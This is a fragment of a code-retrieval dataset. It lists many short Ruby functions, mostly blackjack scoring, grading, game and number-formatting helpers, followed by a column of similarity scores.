"def get_int_value (value_string, current_total)\n case value_string\n # reg exp for 2-10, better way to do this? \n when /[2-9]|[1][0]/ \n value = value_string.to_i \n # face cards\n when /[JQK]/\n value = 10\n # aces\n when \"A\"\n if current_total + 11 <= 21\n value = 11\n else\n value = 1\n end\n end\n value\nend",
"def rank_for_print\n rank_print = @rank\n case @rank\n when :A then rank_print = \"Ace\"\n when :K then rank_print = \"King\"\n when :Q then rank_print = \"Queen\"\n when :J then rank_print = \"Jack\"\n end\n rank_print\n end",
"def determine_shape_for(pc, ri)\n\t\tif pc == '1'\n\t\t\treturn '3' if ri == 'E3' or ri == 'E4' #Flat Rate Envelope\n\t\t\treturn '1' #Letters\n\t\telsif pc == '2'\n\t\t\treturn '3' if ri == 'E3' or ri == 'E4' or ri == 'FE' #Flat Rate Envelope\n\t\t\treturn 'I' if ri == 'E5' or ri == 'E6' or ri == 'E7' #Legal Flat Rate Envelope\n\t\t\treturn '9' if ri == 'FP' #Flat Rate Padded Envelope\n\t\t\treturn '2' #Flats\n\t\telsif pc == '3'\n\t\t\treturn 'J' if ri == 'C6'\n\t\t\treturn 'K' if ri == 'C7'\n\t\t\treturn 'L' if ri == 'C8'\n\t\t\treturn '8' if ri == 'E8' or ri == 'E9' or ri == 'EE' #Regular/Medium Flat Rate Box\n\t\t\treturn '5' #Parcels\n\t\telsif pc == '4'\n\t\t\treturn '5' #Parcels\n\t\telsif pc == '5'\n\t\t\treturn '9' if ri == 'FP' #Flat Rate Padded Envelope\n\t\t\treturn 'F' if ri == 'FS' #Small Flat Rate Box\n\t\t\treturn '8' if ri == 'FB' #Regular/Medium Flat Rate Box\n\t\t\treturn 'D' if ri == 'PL' #Large Flat Rate Box\n\t\t\treturn 'E' if ri == 'PM' #Large Flat Rate Military Box\n\t\t\treturn '5' #Parcels\n\t\telsif pc == 'O'\n\t\t\treturn '7' #PMOD/Pallets\n\t\telse\n\t\t\treturn '0' #Default/Fill\n\t\tend\n\tend",
"def get_grade int\n\tcase int\n\twhen 90...100\n\t\treturn \"A\"\n\twhen 80...89\n\t\treturn \"B\"\n\twhen 70...79\n\t\treturn \"C\"\n\twhen 60...69\n\t\treturn \"D\"\n\twhen 50...59\n\t\treturn \"F\"\n\telse \n\t\treturn \"F\"\n\tend\nend",
"def score\n score = 0\n aces_count = 0\n @hand_contents.each do |card|\n if card.type == :face\n score += 10\n elsif card.type == :ace\n aces_count += 1\n score += 11\n elsif card.type == :number\n score += card.rank.to_i\n end\n end\n\n while score > 21 && aces_count > 0\n score -= 10\n aces_count -= 1\n end\n score\n end",
"def get_energia_lipidos\n\t\t\t\t@lipidos * 9\n\t\t\tend",
"def handle_ace(hand,sum)\n\t\tputs \"inside handleace #{sum} and #{hand}\"\n\t\tif sum > 21 && hand.include?(21)\n\t\t\thand.each { |x| \n\t\t\t\tif x==\"A21\" \n\t\t\t\tx=\"A1\" \n\t\t\t\tend}\n\t\t\treturn hand\n\t\tend\n\tend",
"def which_hand(roll)\n case roll\n when 1..7 then result = \"Right\"\n when 8..9 then result = \"Left\"\n when 10 then result = \"Ambidextrous\"\n end\nend",
"def roman_numeral year\n thou = year/1000\n thou_remain = year%1000\n five_hundreds = thou_remain/500\n hundreds = (thou_remain%500)/100\n fifties = ((thou_remain%500)%100)/50\n tens = (((thou_remain%500)%100)%50)/10\n fives = ((((thou_remain%500)%100)%50)%10)/5\n ones = (((((thou_remain%500)%100)%50)%10)%5)/1\n \n \n #this is just to clear the terminal screen so you only see the result.\n100.times do puts \"\" \n end\n \n #outputs the letters times the number returned.\n puts \"M\" * thou + \"D\" * five_hundreds + \"C\" * hundreds + \"L\" * fifties + \"X\" * tens + \"V\" * fives + \"I\" * ones\nend",
"def preport\r\n\t\tputs \"#@name the #@type with #@health health has found an item and now has #@xp XP!\"\r\n\t\tputs \" \"\r\n\tend",
"def get_cr_or_level(num_of_pcs, cr_or_level)\n if num_of_pcs <= 4\n @cr = cr_or_level\n elsif num_of_pcs == 5\n @cr = cr_or_level + (cr_or_level * 0.25)\n elsif num_of_pcs == 6\n @cr = cr_or_level + (cr_or_level * 0.5)\n elsif num_of_pcs == 7\n @cr = cr_or_level + (cr_or_level * 0.75)\n elsif num_of_pcs == 8\n @cr = cr_or_level + cr_or_level\n end\n end",
"def scoreScissors m\n\t\t[1,0]\n\tend",
"def scoreRock m\n\t\t[0,0]\n\tend",
"def raindrops(number)\n output = \"\"\n if number % 3 != 0 && number % 5 !=0 && number % 7 != 0\n output = number\n end\n if number % 3 == 0\n output += 'Pling'\n end\n if number % 5 == 0\n output += 'Plang'\n end\n if number % 7 == 0\n output += 'Plong'\n end\n puts output\nend",
"def virality\n 0\n end",
"def base\n nombre = @nombre\n b = 1# nombre de diese\n nombre.times do |i|\n if i == 0\n next\n end\n espace = \" \"\n has = \"# \"\n \n c = nombre - i# nombre d'espace\n a = nombre - c\n puts \" #{espace*=c} #{has=has*b}\"\n b = (i + 2 + a)-1# nombre de diese\n end\n\nend",
"def pos_to_slot()\n {1 => 19, 2 => 25, 3 => 31, 4 => 87, 5 => 93, 6 => 99, 7 => 155, 8 => 161, 9 => 167}\nend",
"def calculate_score(hand_of_cards)\n card_values = hand_of_cards.map{|card_value| card_value[1]}\n total = 0 \n card_values.each do |card_value| \n if card_value == \"ACE\"\n total+= 11\n elsif card_value.to_i == 0 #For suits ie Jester, Queen\n total+= 10\n else \n total+= card_value.to_i\n end\n end \n\n#adjust for Aces\n card_values.select{|card| card == \"ACE\"}.count.times do \n total-=10 if total > 21\n end \n total\nend",
"def score\n if strike?\n pins + next_two_rolls rescue nil\n elsif spare?\n pins + next_roll rescue nil\n else\n pins\n end\n end",
"def weight\n 2 # ounces\n end",
"def digit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 46 )\n\n \n # - - - - main rule block - - - -\n # at line 392:10: '0' .. '9'\n match_range( 0x30, 0x39 )\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 46 )\n\n end",
"def comp_choose_rps\n\trand_num = rand(3) \n\tif rand_num == 1 \n\t \"rock\"\n\telsif rand_num == 2 \n\t \"paper\"\n\telse \n\t \"scissors\"\n\tend\nend",
"def bicipital\n\t\t(@bicipital[0] + @bicipital[1] + @bicipital[2])/3\n\tend",
"def forty_two\n self[41]\n end",
"def tiredness (hours)\n if hours == 'ok'\n @rested += 1\n elsif hours == 'bad'\n @rested -= 1\n elsif hours == 'shit'\n @rested -= 5\n elsif hours == 'amazing'\n @rested += 5\n end\n end",
"def CP(level)\r\n cpNeeded = 0\r\n if level > 0 && level <= 5\r\n cpNeeded + 4\r\n elsif level > 5 && level <= 20\r\n cpNeeded + 8\r\n else\r\n cpNeeded + 0\r\n end\r\nend",
"def scorePaper m\n\t\t[0,0]\n\tend",
"def getNbRecompense\n return 0\n end",
"def determine_hand_value(hand)\n value_hand = hand.map do |x|\n if x.include?(\"Ace\")\n x = 11\n elsif [\"K\", \"Q\", \"J\", \"1\"].include?(x[0])\n x = 10\n else\n x = x[0].to_i\n end\n end\n value_hand = value_hand.inject(0) { |result, element| result + element }\n adjust_value_for_aces(hand, value_hand)\nend",
"def australian_postcodes_po_boxes\n nsw = (1000..1999).to_a\n act = (200..299).to_a\n vic = (8000..8999).to_a\n qld = (9000..9999).to_a\n sa = (5800..5999).to_a\n wa = (6800..6999).to_a\n tas = (7800..7999).to_a\n nt = (900..999).to_a\n \n # Convert integers to strings (postcodes are *not* integers)\n (nsw + act + vic + qld + sa + wa + tas + nt).map { |p| \"%04i\" % p }\nend",
"def convert_rt_priority_to_freshdesk (rt_priority)\n return 1 if rt_priority.to_i == 4\n return 2 if rt_priority.to_i == 3\n return 3 if rt_priority.to_i == 2\n return 4 if rt_priority.to_i == 1\nend",
"def print_case\n puts \" 1 2 3\" \n for n in 0..2 do #on commence à compter à 0\n print (65+n).chr + \" \" #affiche 65.chr correspond à A en ACSII donc ensuite en ajoutant n, on a B, C, \n @case_array[n][0].print_case\n print \" | \"\n @case_array[n][1].print_case\n print \" | \"\n @case_array[n][2].print_case \n puts\n end \n end",
"def name\n case @value\n when 0\n 'Joker'\n when 11\n \"Jack of #{@suit}\"\n when 12\n \"Queen of #{@suit}\"\n when 13\n \"King of #{@suit}\"\n when 14\n \"Ace of #{@suit}\"\n else\n \"#{@value.to_s} of #{@suit}\"\n\n end\n end",
"def kcalproteinas\n\t\t\t@proteinas * 4\n\t\tend",
"def value(hand)\n ace_count = 0\n hand_value = 0\n\n hand.each do |card|\n if card == :ace\n ace_count += 1\n hand_value += 11\n else\n hand_value += card\n end\n end\n\n # flip aces from being worth 11 to being worth 1 until we get <= 21\n # or we run out of aces\n while hand_value > 21 && ace_count > 0\n hand_value -= 10\n ace_count -= 1\n end\n\n hand_value\nend",
"def score\n return 'love' if love?\n return \"fifteen\" if fifteen?\n return \"thirty\" if thirty?\n return \"forty\" if forty?\n return \"deuce\" if deuce?\n return \"advantage\" if advantage?\n return \"win\" if win?\n end",
"def non_zero_digit; end",
"def huella_carbono\n if geidiario() < 800\n return 1\n end\n if geidiario() > 1200\n return 3\n else\n return 2\n end\n end",
"def criminal_skills(roll)\n case roll\n when 1..2\n if @@skills.include? \"Barter\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Barter\" # 1 pt max\n end\n when 3..9\n @@skills << \"Climbing\"\n when 10..13\n @@skills << \"Disguise Artist\"\n when 14..19\n @@skills << \"Dodge\"\n when 20..21\n @@skills << \"Driver\"\n when 22\n if @@skills.include? \"Erotic Arts\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Erotic Arts\" # max 1 skill pt in this area\n end\n when 23..25\n if @@skills.include? \"Forgery\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Forgery\"\n @@literacy = \"Literate\"\n end\n when 26..29\n @@skills << \"Gambler\"\n when 30..31\n @@skills << \"Grapple\"\n when 32\n @@skills << \"Gun Slinger\"\n when 33\n @@skills << \"Gunsmith\"\n when 34..37\n @@skills << \"Junk Crafter\"\n when 38..41\n @@skills << \"Knife Fighter\"\n when 42..47\n @@skills << \"Knife Thrower\"\n when 48..51\n @@skills << \"Lying\"\n when 52\n @@skills << \"Medic\"\n when 53..54\n if @@skills.include? \"Navigate by Stars\"\n @@criminal_skill_rolls += 1\n else\n @@skills << \"Navigate by Stars\" # max 1 point in this skill\n end\n when 55\n @@skills << \"Negotiating\"\n when 56..66\n @@skills << \"Pick Locks\"\n when 67..77\n @@skills << \"Pick Pocket\"\n when 78\n @@skills << \"Pilot\"\n when 79\n @@skills << \"Relic Knowledge\"\n when 80..81\n @@skills << \"Riding\"\n when 82\n @@skills << \"Sniper\"\n when 83..88\n @@skills << \"Stealth\"\n when 89..91\n @@skills << \"Tracking\"\n when 92..94\n @@skills << \"Unarmed Combat\"\n when 95\n @@skills << \"Wilderness Survival\"\n when 96..100\n @@skills << \"Weapons Expert\"\n # if rolled more than once, take a second level in the same weapon or randomly roll a new weapon -- player's choice. Mutants and cyborgs can choose to apply the weapon expert skill to a mutation or implant, as desired.\n end\nend",
"def printCard(card_number)\n \n # get card rank\n rank = case card_number % 13\n when 0 then :King\n when 1 then :Ace\n when 11 then :Jack\n when 12 then :Queen\n else card_number % 13 \n end\n \n # get suit\n suit = case (card_number) % 4\n when 0 then :Heart\n when 1 then :Diamond\n when 2 then :Spade\n else :Club\n end\n\n return \"#{rank} of #{suit}\"\n \nend",
"def how_many_light_sabers_do_you_own(name = \"\")\n name == \"Zach\" ? 18 : 0\nend",
"def get_grade(n)\n puts n\n case n\n when 90..100\n p \"A\"\n when 80..89\n p \"B\"\n when 70..79\n p \"C\"\n when 60..69\n p \"D\"\n when 00..59\n p \"F\"\n else\n puts \"Please enter a number.\"\n end\n\nend",
"def assess_situation(number, announcement, excuse)\n if number == 99\n puts \"#{excuse}\"\n elsif number == 21\n puts \"#{announcement}\"\n else number == 3\n puts \"Meh. Hard Pass\"\n end\nend",
"def get_numerology (your_number)\r\n\tcase your_number\r\n\t\twhen 1\r\n\t\t\tputs \"You are a ONE! One is the leader. The number one indicates the ability to stand alone, and is a strong vibration. Ruled by the Sun.\"\r\n\t\twhen 2\r\n\t\t\tputs \"You are a TWO! This is the mediator and peace-lover. The number two indicates the desire for harmony. It is a gentle, considerate, and sensitive vibration. Ruled by the Moon.\"\r\n\t\twhen 3\r\n\t\t\tputs \"You are a THREE! Number Three is a sociable, friendly, and outgoing vibration. Kind, positive, and optimistic, Three’s enjoy life and have a good sense of humor. Ruled by Jupiter.\"\r\n\t\twhen 4\r\n\t\t\tputs \"You are a FOUR! This is the worker. Practical, with a love of detail, Fours are trustworthy, hard-working, and helpful. Ruled by Uranus.\"\r\n\t\twhen 5\r\n\t\t\tputs \"You are a FIVE! This is the freedom lover. The number five is an intellectual vibration. These are ‘idea’ people with a love of variety and the ability to adapt to most situations. Ruled by Mercury.\"\r\n\t\twhen 6 \r\n\t\t\tputs \"You are a SIX! This is the peace lover. The number six is a loving, stable, and harmonious vibration. Ruled by Venus.\"\r\n\t\twhen 7 \r\n\t\t\tputs \"You are a SEVEN! This is the deep thinker. The number seven is a spiritual vibration. These people are not very attached to material things, are introspective, and generally quiet. Ruled by Neptune.\"\r\n\t\twhen 8 \r\n\t\t\tputs \"You are an EIGHT! This is the manager. Number Eight is a strong, successful, and material vibration. Ruled by Saturn.\"\r\n\t\twhen 9\r\n\t\t\tputs \"You are a NINE! This is the teacher. Number Nine is a tolerant, somewhat impractical, and sympathetic vibration. Ruled by Mars.\"\r\n\t\telse \r\n\t\t\tputs \"Sorry, but your number doesn't exist.\"\r\n\tend\r\nend",
"def print_changing_numbers\n\t\ti = 1\n\t\t#zolang i kleiner is dan 11\n\t\twhile i < 11\n\t\t\t#print de string met het nummer variabele en verhoog het daarna met 1\n\t\t\tputs \"This sentence is number #{i}\"\n\t\t\ti = i+1\n\t\tend\n\tend",
"def cuantos_pares\n @pares = []\n @pares = @valores.to_h.select{|k, v| (2..2).cover?(v)}\n @pares.size\n end",
"def digit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 37 )\n\n type = DIGIT\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 136:8: '0' .. '9'\n match_range( 0x30, 0x39 )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 37 )\n\n end",
"def roman_numeral number\n\nend",
"def digit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 53 )\n\n type = DIGIT\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 352:8: '0' .. '9'\n match_range( 0x30, 0x39 )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 53 )\n\n end",
"def score\n result = 0\n tiro_index = 0\n rellenar_vector\n\n 10.times do\n if strike?(tiro_index)\n result += strike_Score(tiro_index)\n tiro_index += 1\n elsif spare?(tiro_index)\n\n result += spare_score(tiro_index)\n tiro_index += 2\n else\n result += cuadro_score(tiro_index)\n tiro_index += 2\n end\n end\n result\n end",
"def preferences\n [\n {fish: 15, leisure: 1},\n {fish: 15, leisure: 0},\n {fish: 14, leisure: 0},\n {fish: 13, leisure: 0},\n {fish: 12, leisure: 0},\n {fish: 11, leisure: 0},\n {fish: 10, leisure: 0},\n {fish: 9, leisure: 0},\n {fish: 8, leisure: 0},\n {fish: 7, leisure: 0},\n {fish: 6, leisure: 0},\n {fish: 5, leisure: 0},\n {fish: 4, leisure: 0},\n {fish: 3, leisure: 0},\n {fish: 2, leisure: 0},\n {fish: 1, leisure: 0},\n {fish: 0, leisure: 0}\n ]\n end",
"def ayarla(toplam)\n if toplam > 0\n return 1\n else\n return 0\n end\n end",
"def - rival\n case rival\n when Paper\n puts 'Paper tie (loser Paper)'\n when Scissors\n puts 'Scissors cut Paper (loser Paper)'\n when Lizard\n puts 'Lizard eats Paper (loser Paper)'\n else\n return rival - self\n end\n Paper\n end"
] | [
"0.61682594",
"0.5817779",
"0.5750655",
"0.56960154",
"0.5677398",
"0.5660142",
"0.56399095",
"0.5547494",
"0.5535588",
"0.5528255",
"0.5483012",
"0.54519147",
"0.5434948",
"0.54230285",
"0.541586",
"0.5403975",
"0.53857213",
"0.5367293",
"0.5358745",
"0.53388107",
"0.53162485",
"0.5312163",
"0.53116137",
"0.5307852",
"0.530172",
"0.5299927",
"0.5292735",
"0.52912796",
"0.52880275",
"0.5284393",
"0.52770674",
"0.52688825",
"0.52606964",
"0.52606964",
"0.5248154",
"0.5236471",
"0.5215105",
"0.5211385",
"0.5211154",
"0.52055776",
"0.5202333",
"0.52005565",
"0.51977277",
"0.5194523",
"0.51838505",
"0.5181531",
"0.5180617",
"0.5179706",
"0.517797",
"0.5174341",
"0.5173554",
"0.51732105",
"0.5170943",
"0.51664937",
"0.51612085",
"0.51576674",
"0.5157412",
"0.51526326",
"0.51481813",
"0.51473916",
"0.51444376",
"0.5142608",
"0.5142127",
"0.5136651",
"0.5128358",
"0.5119313",
"0.5116132",
"0.5113206",
"0.5112608",
"0.5111912",
"0.5111329",
"0.5106036",
"0.5102099",
"0.51016647",
"0.5100237",
"0.50976485",
"0.50923514",
"0.5091495",
"0.5090733",
"0.50890297",
"0.50867426",
"0.5084875",
"0.50846595",
"0.5083726",
"0.50794303",
"0.50786716",
"0.5077489",
"0.5075183",
"0.507076",
"0.5070744",
"0.5059963",
"0.5056383",
"0.5055364",
"0.5051853",
"0.504906",
"0.50470483",
"0.50453335",
"0.5044858",
"0.50443035",
"0.5036427",
"0.503423"
] | 0.0 | -1 |
0 is Aries, 11 is Pisces. | def zodiacComplements(sign)
return [(sign+1)%12,(sign+11)%12]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def cardinal; end",
"def kcallipidos\n\t\t\t@lipidos * 9\n\t\tend",
"def rentas\n profesion ? 1 : 0\n end",
"def pontosStrike index\n\t\tif @rolls[index + 2]\n\t\t\tif @rolls[index + 2] == 10\n\t\t\t\tif @rolls[index + 4]\n\t\t\t\t\t10 + 10 + @rolls[index + 4]\n\t\t\t\telse\n\t\t\t\t\t10 + 10\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tif @rolls[index + 3]\n\t\t\t\t\t10 + @rolls[index + 2] + @rolls[index + 3]\n\t\t\t\telse\n\t\t\t\t\t10 + @rolls[index + 2]\n\t\t\t\tend\n\t\t\tend\t\n\t\telse \n\t\t\t10\n\t\tend\n\tend",
"def psh_bonuses(roll)\n case roll\n when 1..5\n @@skills << \"Brawling\"\n puts \"Brawling skill\"\n when 6..10\n @@skills << \"Stealth\"\n puts \"Stealth skill\"\n when 11..15\n @@skills << \"Weapons Expert\"\n puts \"Wpn expert!\"\n when 16..20\n @@skills << \"Dodge\"\n puts \"Dodge skill\"\n when 21..37\n @@endurance += 1\n @@strength += 1\n @@agility += 1\n @@accuracy += 1\n @@willpower += 1\n @@intelligence += 1\n @@perception += 1\n @@appearance += 1\n puts \"+1 to each attribute\"\n when 38..44\n @@endurance += (d(6) + d(6))\n puts \"+2d6 endurance\"\n when 45..51\n @@strength += (d(6) + d(6))\n puts \"+2d6 strength\"\n when 52..58\n @@agility += (d(6) + d(6))\n puts \"+2d6 agility\"\n when 59..65\n @@accuracy += (d(6) + d(6))\n puts \"+2d6 accuracy\"\n when 66..74\n @@intelligence += (d(6) + d(6) + d(6))\n puts \"+3d6 intelligence\"\n when 75..83\n @@willpower += (d(6) + d(6))\n puts \"+2d6 willpower\"\n when 84..90\n @@appearance += (d(6) + d(6) + d(6))\n puts \"+3d6 appearance\"\n when 91..97\n @@skills << \"Martial Arts\"\n puts \"Martial arts skill!\"\n when 98..99\n @@endurance += 2\n @@strength += 2\n @@agility += 2\n @@accuracy += 2\n @@willpower += 2\n @@intelligence += 2\n @@perception += 2\n @@appearance += 2\n puts \"+2 to each attribute\"\n when 100\n @@endurance += d(6)\n @@strength += d(6)\n @@agility += d(6)\n @@accuracy += d(6)\n @@willpower += d(6)\n @@intelligence += d(6)\n @@perception += d(6)\n @@appearance += d(6)\n puts \"JACKPOT -- +d6 to EACH Attribute!\"\n end\n\n end",
"def imc\n\t\tnum = (@peso/(@talla*@talla)).round(2)\n\t\tif num < 18.5\n\t\t\tnum #- Bajo peso\"\n\t\telsif num > 18.5 and num < 24.9\n\t\t\tnum #- Adecuado\"\n\t\telsif num > 25.0 and num < 29.9\n\t\t\tnum #- Sobrepeso\"\n\t\telsif num > 30.0 and num < 34.9\n\t\t\tnum #Obesidad grado 1\"\n\t\telsif num > 35.0 and num < 39.9\n\t\t\tnum #- Obesidad grado 2\"\n\t\telsif num > 40\n\t\t\tnum #- Obesidad grado 2\"\n\t\tend\t\t\t\n\tend",
"def pontosSpare index\n\t\tif @rolls[index + 1]\n\t\t\t10 + @rolls[index + 1]\n\t\telse\n\t\t\t10\n\t\tend\n\tend",
"def scorePaper m\n\t\t[0,1]\n\tend",
"def scorePaper m\n\t\t[1,0] \n\tend",
"def ordinal; end",
"def smart_aces hand\n# Adjusts the value of \"Ace\" elements to be either 1 or 11 depending on the hand total\n\thand_total = hand.reduce :+\n\tif hand_total < 12 && hand_total > 2\n\t\thand.map! do |card|\n\t\t\tif card == 1\n\t\t\t\t11\n\t\t\telse\n\t\t\t\tcard\n\t\t\tend\n\t\tend\n\telsif hand_total > 21\n\t\thand.map! do |card|\n\t\t\tif card == 11\n\t\t\t\t1\n\t\t\telse\n\t\t\t\tcard\n\t\t\tend\n\t\tend\n\telsif hand_total == 2\n\t\thand[0] = 11\n\tend\n\nend",
"def scoreRock m\n\t\t[0,1] \n\tend",
"def total\n total = 0\n aces = 0\n @hand.each do |card|\n case card[0]\n when 2..10 then total += card[0]\n when 'A' then aces += 1\n else total += 10\n end\n end\n total += add_aces(total, aces)\n total\n end",
"def raindrops num\n output = \"\"\n output << \"Pling\" if num % 3 == 0\n output << \"Plang\" if num % 5 == 0\n output << \"Plong\" if num % 7 == 0\n output.empty? ? num.to_s : output\nend",
"def vypis_reseni\n\n vystup = \"(\"\n @reseni.each do |prvek|\n if(prvek)then\n vystup += \"1\"\n else\n vystup += \"0\"\n end \n end\n vystup += \")\"\n \n return vystup\n end",
"def natural_bonus\n 0\n end",
"def values\n return [1,11] if ace?\n return [10] if face_card?\n [@identifier]\n end",
"def numbers\n @board.map!.with_index do |e, i|\n e == AIR ? i.to_s : e\n end\n draw_board\nend",
"def scoreRock m\n\t\t[1,0]\n\tend",
"def value(hand)\n # Sorting hack to get aces at the very end so we count them last\n hand.sort_by { |c| c.to_i != 0 ? c : c[0] - 81 }.reverse().inject(0) do |total,cur|\n if cur.to_i != 0\n total + cur # 2-10 case\n elsif [\"J\",\"Q\",\"K\"].include? cur\n total + 10 # J,Q, or K\n elsif cur == \"A\"\n if (total+11) > 21\n total + 1 # Count ace as 1\n else\n total+11 # Count ace as 11\n end\n end\n end\n end",
"def raindrops(number)\n raindrops_str = ''\n\n raindrops_str += 'Pling' if number % 3 == 0\n raindrops_str += 'Plang' if number % 5 == 0\n raindrops_str += 'Plong' if number % 7 == 0\n\n if raindrops_str == ''\n raindrops_str = number.to_s\n end\n\n raindrops_str\nend",
"def dices\n\t\t@rollAgain = 0\n\t\t@goalParam = 0\n\tend",
"def primordial; end",
"def score\n return 'love' if @points == 0\n return 'fifteen' if @points == 1\n return 'thirty' if @points == 2\n return 'forty' if @points == 3 \n end",
"def succ\n if (@type == \"t\" && @number == 4) || (@type != \"t\" && @number == 9)\n number = 1\n elsif @type == \"t\" && @number == 7\n number = 5\n else\n number = @number + 1\n end\n return Pai.new(@type, number)\n end",
"def charge(age)\n case age\n when (0..6)\n 0\n when (7..12)\n 300\n when (13..18)\n 600\n else\n 1000\n end\nend",
"def set\n\t$one = \"1\"\n\t$two = \"2\"\n\t$three = \"3\"\n\t$four = \"4\"\n\t$five = \"5\"\n\t$six = \"6\"\n\t$seven = \"7\"\n\t$eight = \"8\"\n\t$nine = \"9\"\n\t$turn = 0\t\t\nend",
"def fo_tool\n return actor.equips[0] if actor.primary_use == 1\n return actor.equips[1] if actor.primary_use == 2\n return actor.assigned_item if actor.primary_use == 3\n return actor.assigned_item2 if actor.primary_use == 4\n return actor.assigned_item3 if actor.primary_use == 5\n return actor.assigned_item4 if actor.primary_use == 6\n return actor.assigned_skill if actor.primary_use == 7\n return actor.assigned_skill2 if actor.primary_use == 8\n return actor.assigned_skill3 if actor.primary_use == 9\n return actor.assigned_skill4 if actor.primary_use == 10\n end",
"def score\n\t\tpontos = 0\n\t\tindex = 0\n\t\twhile (index < 20 && @rolls[index]) do\n\t\t\tif strike? index\n\t\t\t\tpontos += pontosStrike (index)\n\t\t\telsif spare? index\n\t\t\t\tpontos += pontosSpare (index)\n\t\t\telsif @rolls[index + 1]\n\t\t\t\tpontos += @rolls[index] + @rolls[index + 1]\n\t\t\telse\n\t\t\t\tpontos += @rolls[index]\n\t\t\tend\n\t\t\tindex += 2\n\t\tend\n\t\tpontos\n\tend",
"def card_scores\n card_scores = {\n \"JOKER\" => 13, \"J♠\" => 12, \"J♣\" => 11, \"A♠\" => 10, \"K♠\" => 9, \"Q♠\" => 8,\n \"10♠\" => 7, \"9♠\" => 6, \"8♠\" => 5, \"7♠\" => 4, \"6♠\" => 3, \"5♠\" => 2\n }\n card_scores.default = 0\n\n card_scores\n end",
"def clasificar\n if @sal <= 1\n \"poca\" \n elsif @sal > 1 and @sal <= 2\n \"media\"\n elsif @sal > 2\n \"mucha\"\n end\n end",
"def Traductor nume\n\nnumero = {}\nnumero[0] = \"Cero\"\nnumero[1] = \"Uno\"\nnumero[2] = \"Dos\"\nnumero[3] = \"Tres\"\nnumero[4] = \"Cuatro\"\nnumero[5] = \"Cinco\"\nnumero[6] = \"Seis\"\nnumero[7] = \"Siete\"\nnumero[8] = \"Ocho\"\nnumero[9] = \"Nueve\"\nnumero[10] = \"Diez\"\n\n\n\nreturn numero[nume.to_i]\n\n\nend",
"def score\n return 'love' if @points == 0\n return 'fifteen' if @points == 1\n return 'thirty' if @points == 2\n return 'forty' if @points == 3\n end",
"def score\n return 'love' if @points == 0\n return 'fifteen' if @points == 1\n return 'thirty' if @points == 2\n return 'forty' if @points == 3\n end",
"def boatswain\n return self.swabbie unless self.swabbie.nil?\n highval = 0\n self.axe.each do |flotsam|\n counter = self.filibuster(flotsam)\n highval = ((highval <=> counter) == 1) ? highval : counter\n end\n \".#{highval + 1}\"\n end",
"def single_card_value(card)\n case card[1].strip\n when \"2\"..\"10\" then card[1].to_i\n when \"J\", \"Q\", \"K\" then 10\n when \"A\" then 11\n end\nend",
"def get_hand_value(hand)\n hand_values = hand.map { |card| card[0]} \n \n total = 0\n #check if there are any Aces\n hand_values.each do |value|\n if value == 'A'\n total += 11\n elsif value.to_i == 0 # this is for J, Q, K\n total += 10\n else\n total += value.to_i\n end\n end\n # To accomodate Aces, subtract 10 from the total per Ace if the total is >21\n hand_values.select{|value| value == \"A\"}.count.times do \n total -= 10 if total >21\n end\n total\nend",
"def score \n return 'love' if @points == 0 \n return 'fifteen' if @points == 1 \n return 'thirty' if @points == 2 \n return 'forty' if @points == 3\n end",
"def apportion\n 385.times do |n|\n state = find_highest_priority\n @seats[state] += 1\n\n seat_number = 51 + n\n puts \"Assigning Seat #{seat_number} to #{state}\"\n end\n\n puts \"Just missed the cut...\"\n state = find_highest_priority\n puts \"Seat 436 would be assigned to #{state}\"\n\n @seats.each do |state, seats|\n printf(\"%20s\\t%3d\\n\", state, seats)\n end\n end",
"def scoreScissors m\n\t\t[0,1] \n\tend",
"def score(card)\n case card\n when :ace then 11 # assigns value to each symbol, helps with scoring\n when :king then 10\n when :queen then 10\n when :jack then 10\n else card\n end\nend",
"def pcode4\n school.sierra_code\n end",
"def ace_check\n cards[index_of_11][:points] = 1 if index_of_11 && (total > 21)\n end",
"def get_hand_score\n score = 0\n \n # Add up score of non-aces\n values = hand.map{|card| card.value}\n values.each do |val|\n if Array(2..10).include?(val.to_i)\n score += val.to_i\n elsif [\"J\", \"Q\", \"K\"].include?(val)\n score += 10\n end\n end\n\n # deal with the aces\n values.count(\"A\").times do\n if score + 11 <= 21\n score += 11\n else\n score += 1\n end\n end\n\n return score\n end",
"def digit; end",
"def check4aces num\n \tnum.each do |x|\n\t\tif x == 11\n\t\t\t@pScore.delete(11)\n\t\t\t@pScore << 1\n\t\tend\n\tend\n end",
"def roman digit\n\n\trules = [ 'I', 'V', 'X', 'L', 'C', 'D', 'M']\n\tnum = digit[0]\n\tplace = digit[1]\n\n\nromannumeral = []\nif num == 5\n\tromannumeral.push rules[place+1].to_s\n\n\nelse if num > 5\n\tromannumeral.push rules[place+1].to_s\n\tnum = num - 5\n\tnum.times do\n\tromannumeral.push rules[place].to_s\n\tend\n\nelse if num < 5\n\tnum.times do\n\t\tputs 'num<5'\n\tromannumeral.push rules[place].to_s\n\tend\n\n\tend\n\tend\n\tend\n\nreturn romannumeral\nend",
"def goal\n 28\n end",
"def get_int_value (value_string, current_total)\n case value_string\n # reg exp for 2-10, better way to do this? \n when /[2-9]|[1][0]/ \n value = value_string.to_i \n # face cards\n when /[JQK]/\n value = 10\n # aces\n when \"A\"\n if current_total + 11 <= 21\n value = 11\n else\n value = 1\n end\n end\n value\nend",
"def rank_for_print\n rank_print = @rank\n case @rank\n when :A then rank_print = \"Ace\"\n when :K then rank_print = \"King\"\n when :Q then rank_print = \"Queen\"\n when :J then rank_print = \"Jack\"\n end\n rank_print\n end",
